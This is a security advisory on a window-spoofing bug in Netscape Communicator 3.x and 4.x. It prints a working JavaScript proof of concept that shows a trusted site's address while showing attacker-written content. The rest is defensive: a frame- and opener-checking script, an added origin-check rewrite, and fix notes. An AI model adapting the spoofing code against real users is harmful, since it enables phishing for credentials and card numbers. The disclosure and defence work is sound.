COMMAND

    Netscape Communicator

SYSTEMS AFFECTED

    Netscape Communicator 3.x, 4.x (IE?)

PROBLEM

    Georgi Guninski found the following. There is a bug in Netscape
    Communicator 3.04, 4.06 and 4.5 on Win95 and 4.08 on WinNT which
    allows "window spoofing". After visiting a hostile page (or clicking
    a hostile link) a window is opened whose location is a trusted site.
    However, the content of the window is not that of the original site;
    it is supplied by the owner of the hostile page. So the user is
    misled into believing he is browsing a trusted site while he is in
    fact browsing a hostile page, and may provide sensitive information
    such as a credit card number. The bug may also be exploited via an
    HTML mail message. It needs Javascript enabled. A demonstration is
    available at:

        http://www.nat.bg/~joro/b14.html
        http://www.whitehats.com/guninski/b14.html

    This bug  is different  from the  "frame spoofing  vulnerability".
    The code is:

        <SCRIPT LANGUAGE="JavaScript">

        // Runs 30 seconds after the window was opened: replaces the
        // content of the opened window while its location bar still
        // shows the trusted site.
        function doit()
        {
          a.document.open();
          a.document.write("<H1>Look at the location bar!<BR>");
          a.document.write("<A HREF='http://www.whitehats.com/guninski'>Go to Georgi Guninski's home page</A></H1>");
          a.document.close();
        }

        // Opens the window on a view-source:javascript: URL that sets its
        // location to the trusted site, then schedules doit().
        function winopen() {
          a=window.open("view-source:javascript:location='http://www.yahoo.com';");
          setTimeout('doit()',30000);
        }

        </SCRIPT>


        <A HREF="javascript:void(0)" onclick="winopen()"
        onMouseOver="window.status='http://www.yahoo.com';return true">
        Follow this link to go to www.yahoo.com (or somewhere else)
        </A>

    According to Robert Thomas, this was reported earlier by Secure
    Experts as a frame spoof bug. MS came up with a lame patch for IE
    (which didn't work for all cases, BTW). Secure Experts seem to have
    come up with the following. The page being called up in the window,
    i.e. the page to be protected, should contain the following script
    (frames or not):

    <SCRIPT LANGUAGE="JavaScript">

    <!--

    // Start the periodic check as soon as the script loads.
    checkMyFramesMulti();

    // Any script error on this page (for example a frame that refuses
    // to reveal its location) is treated as evidence of tampering.
    function ErrorHandler(errorMessage, url, line)
    {
      spoofDetected("  Error message: " +
                    errorMessage +
                    "\n  Line number: " +
                    line, "TOP", url);
      return true;
    }

    onerror = ErrorHandler;

    // Re-run the check every 15 seconds for the life of the page.
    function checkMyFramesMulti()
    {
      checkMyFrames();
      setTimeout("checkMyFramesMulti()", 15000);
    }

    // Called from a frame's onUnload handler: re-check shortly after a
    // frame has been replaced.
    function checkMe()
    {
      setTimeout("checkMyFrames()", 3000);
    }

    function checkMyFrames()
    {
      var browsername = navigator.appName;
      var browserversion = parseInt(navigator.appVersion);
      var itsok;
      var frameUrl;
      var numFrames;
      var i;

      // A protected page should never have been opened by another
      // window; a non-null opener means some other page created it.
      if( (browsername == "Netscape") && (browserversion >= 3) )
      {
        if( self.opener != null )
          spoofDetected(" OPENER NOT NULL!!", "TOP", "self.opener");
      }

      // The top-level document must itself be on the allowed list.
      frameUrl = location.href;
      itsok = urlOk(frameUrl);
      if( itsok.indexOf("false") == 0 )
        spoofDetected(" Top is bad!!", "TOP", frameUrl);

      // So must every frame it contains.
      numFrames = self.frames.length;

      for( i = 0; i < numFrames; i++ )
      {
        frameUrl = self.frames[i].location.href;
        itsok = urlOk(frameUrl);
        if( itsok.indexOf("false") == 0 )
          spoofDetected(" This frame is bad!!", i, frameUrl);
      }
    }

    // Returns the string "true" when frameUrl starts with one of the
    // allowed URLs, "false" otherwise. Note that this is a plain string
    // prefix comparison, not a comparison of the host name.
    function urlOk(frameUrl)
    {
      var thismany = parseInt(getAuthInfoNum());
      var itsok = "false";
      var Url;
      var i;
      for( i = 0; i < thismany; i++)
      {
        Url = getAuthInfo(i);
        if(frameUrl.indexOf(Url) == 0)
          itsok = "true";
      }
      return itsok;
    }

    // Break the link to the opener (if any) and send the whole window
    // to the error page. msg, frm and theUrl are accepted for logging
    // but not displayed here.
    function spoofDetected(msg, frm, theUrl)
    {
      var browsername = navigator.appName;
      var browserversion = parseInt(navigator.appVersion);

      if( (browsername == "Netscape") && (browserversion >= 3) )
      {
        if( self.opener != null )
          self.opener = null;
      }
      // spoofpage.html is an error page that gets pulled up on
      // detection of an error.

      top.location.href = "spoofpage.html";
    }

    // The allowed-URL list; www.agency.gov stands for the protected
    // site and its framed documents.
    function getAuthInfo(whichone) {
      var legalUrls = new Array('http://www.agency.gov',
                                'http://www.agency.gov/left.html',
                                'http://www.agency.gov/top.html',
                                'http://www.agency.gov/main.html');
      return legalUrls[whichone];
    }

    // Number of entries in the list above.
    function getAuthInfoNum() {
      return 4;
    }
    // -->

    </SCRIPT>

    In each framed page, add an onUnload handler that asks the parent to
    re-check its frames:

        <BODY BGCOLOR="#FFFFFF" onUnload="parent.checkMe()">
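    As an added example (not the advisory's or Secure Experts' code),
    here is the allow-list and opener check from the script above
    rewritten so it can be exercised outside a browser. It keeps the
    original's prefix test as prefixAllowed() and sets a stricter
    originAllowed() beside it, which parses the URL with the standard
    URL class and compares scheme and host exactly, so neither a
    look-alike host name nor a javascript: or view-source: URL passes.
    detectSpoof() mirrors checkMyFrames() but returns its findings
    instead of navigating to spoofpage.html. The host www.agency.gov is
    the advisory's placeholder; the neighbouring host names and the two
    window states are constructed for the demonstration.

```javascript
// Added example, not part of the original advisory. Requires the WHATWG
// URL class, which Node.js and current browsers provide globally.

// The advisory's urlOk() logic: accept when the URL *starts with* one of
// the allowed strings. Kept here only to contrast it with originAllowed().
function prefixAllowed(url, allowedUrls) {
  return allowedUrls.some((allowed) => url.indexOf(allowed) === 0);
}

// Stricter variant: parse the URL and compare scheme + host (+ port)
// exactly. Unparsable input and non-http(s) schemes are rejected.
function originAllowed(url, allowedOrigins) {
  let parsed;
  try {
    parsed = new URL(url);            // throws on unparsable input
  } catch (e) {
    return false;                     // garbage is never allowed
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    return false;                     // javascript:, view-source:, about: ...
  }
  return allowedOrigins.includes(parsed.origin);
}

// Mirror of checkMyFrames(): the opener check, the top-level URL check
// and one check per frame. state is a plain object standing in for the
// browser's window/frames; findings are returned for the caller.
function detectSpoof(state, allowedOrigins) {
  const findings = [];
  if (state.openerPresent) {
    findings.push({ where: "TOP", reason: "OPENER NOT NULL", url: "self.opener" });
  }
  if (!originAllowed(state.topUrl, allowedOrigins)) {
    findings.push({ where: "TOP", reason: "Top is bad", url: state.topUrl });
  }
  state.frameUrls.forEach((frameUrl, i) => {
    if (!originAllowed(frameUrl, allowedOrigins)) {
      findings.push({ where: i, reason: "This frame is bad", url: frameUrl });
    }
  });
  return findings;
}

// The protected site, using the advisory's placeholder host name.
const ALLOWED_ORIGINS = ["http://www.agency.gov"];

// Constructed sample states: a legitimate framed page, and one that was
// opened by another window and whose frames now point elsewhere.
const clean = {
  openerPresent: false,
  topUrl: "http://www.agency.gov/",
  frameUrls: ["http://www.agency.gov/left.html", "http://www.agency.gov/main.html"],
};
const spoofed = {
  openerPresent: true,
  topUrl: "http://www.agency.gov/",
  frameUrls: ["http://www.agency.gov.example/left.html", "javascript:void(0)"],
};

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.log("clean:", detectSpoof(clean, ALLOWED_ORIGINS));
  console.log("spoofed:", detectSpoof(spoofed, ALLOWED_ORIGINS));
  // The constructed look-alike host passes the prefix test but not the
  // origin test, which is the point of the stricter check.
  console.log("prefix:", prefixAllowed(spoofed.frameUrls[0], ALLOWED_ORIGINS));
  console.log("origin:", originAllowed(spoofed.frameUrls[0], ALLOWED_ORIGINS));
}
```

    Run it with node; the clean state yields no findings, the spoofed
    state yields three (the opener and both frames). In a real page the
    findings would feed spoofDetected() as in the script above; the list
    of origins replaces the per-document URL list, since an origin
    comparison already covers every path on the protected host.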

SOLUTION

    Disable Javascript. The solution above was provided to a US
    Government Agency by a contractor. The agency has high public trust
    and visibility, and this was a concern. Any questions can be
    addressed to krawls@erols.com. Netscape acknowledged the bug. Frames
    or not, this bug was discussed in some detail in the O'Reilly book
    _Web Security and Commerce_ by Garfinkel and Spafford. Since its
    original publication date is June 1997, this bug has been known for
    almost two years. Netscape released version 4.51 of Communicator,
    which seems to fix the window spoofing bug.